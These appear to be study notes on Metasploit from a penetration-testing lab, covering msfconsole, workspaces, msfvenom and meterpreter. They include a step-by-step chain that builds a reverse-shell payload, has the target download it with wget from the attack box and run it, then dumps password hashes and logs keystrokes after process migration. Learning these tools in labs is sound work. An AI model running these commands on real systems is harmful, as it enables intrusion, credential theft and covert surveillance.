Understanding Metasploit

MSFCONSOLE

Let's use port scanning as an example:

search portscan

pick a scanner:

use # <-- this is the number to the left of the module

then use

show options

to see what options are available for your choice. Set your options (for example):

set RHOSTS 10.10.12.148

Some modules have multiple payloads. Make sure to show options as they may change.

show payloads <-- Show the available payloads
set payload # <-- choose which payload to use.

Before you start msfconsole:

systemctl start postgresql
msfdb init

Start msfconsole then check

db_status

Working with workspaces (workspace -h):

workspace <-- lists workspaces
workspace -a timmy <-- creates a new workspace named timmy
workspace default <-- switches from timmy back to the default workspace
workspace -d timmy <-- deletes the workspace called timmy

Once you're into a workspace you can use 'help' to see the things you can do and store in that database. For example running 'db_nmap -sV -p- 10.10.12.229' will do an nmap scan and store all the information into the database so you can recall it later.

hosts or services -h <--help
hosts <-- shows all the hosts it found
services <-- shows all the services it found for those hosts
services -S netbios <-- shows the service for just netbios
hosts -R <-- will set the host for RHOSTS in all modules. If there are more than one host it will set them all as the RHOSTS option.

sessions <-- see your sessions
sessions -i # <-- interact with the numbered session
ctrl+z <-- background a session
ctrl+c <-- exit a session

use exploit/multi/handler <-- catches shells used in metasploit

An example usage:

use exploit/multi/handler
set payload php/reverse_php 
set lhost 10.10.24.119
set lport 7777
show options
run

MSFVENOM

This let's you create payloads - its a side hustle on the metasploit side.

msfvenom -l payloads <-- list all the payloads
msfvenom -l payloads | grep "linux/x86" | grep "reverse_tcp" <-- search for a linux payload that gives us a reverse tcp connection
msfvenom -p  <--list supported output formats
-e <-- encodes (not obfuscate, just encode)
msfvenom -p php/reverse_php LHOST=10.0.2.19 LPORT=7777 -f raw > reverse_shell.php <-- example php reverse shell ** NOTE you will need to add the PHP tags to this, be sure to edit after.

We have access to a device to upload a file, it's a linux system.

First, we create a reverse shell on our attack box using msfvenom

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=XXXX -f elf > rev_shell.elf

Next we host it on a python web server on our attack box

python3 -m http.server 9000

We download the file on the vulnerable linux box

wget http://[ATTACK-BOX]:9000/rev_shell.elf

We set it as executable

chmod +x rev_shell.elf

We run the .elf file on the vulnerable linux box

./rev_shell.elf

Switching back over to our attack box we start msfconsole and start the listener.

msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST [ATTACK-BOX-IP]
set LHOST 4444
run

This should catch our reverse shell. Now that we have a shell, we background it with ctrl+z, taking note of the session number. We then search for an exploit to use - in this example we're going to dump hashes

search linux hashes
use 0
set session 2
exploit

METERPRETER

Meterpreter will run in memory, as a process, on the target system and act as an encrypted TLS agent within a command and control architecture.

Always run the help menu to see the available commands. Each meterpreter shell is different based on the system and payload it's using. Here are a few commands that might be useful

getuid <-- see which user you're running as.
hashdump <-- dump the SAM database hashes
search -f flag.txt <-- searches for a file named flag.txt
shell <-- get a cmd shell (ctrl+z will bring you back)
load python <-- loads python modules, can also use others like kiwi (mimikatz), etc

Moving your meterpreter process to that of another app can sometimes provide useful (just note you may loose your privilages). For example, say we list the running processes using PS. We see word there so we migrate to that process and start capturing keystrokes:

ps
migrate 1276
keyscan_start
keyscan_stop
keyscan_dump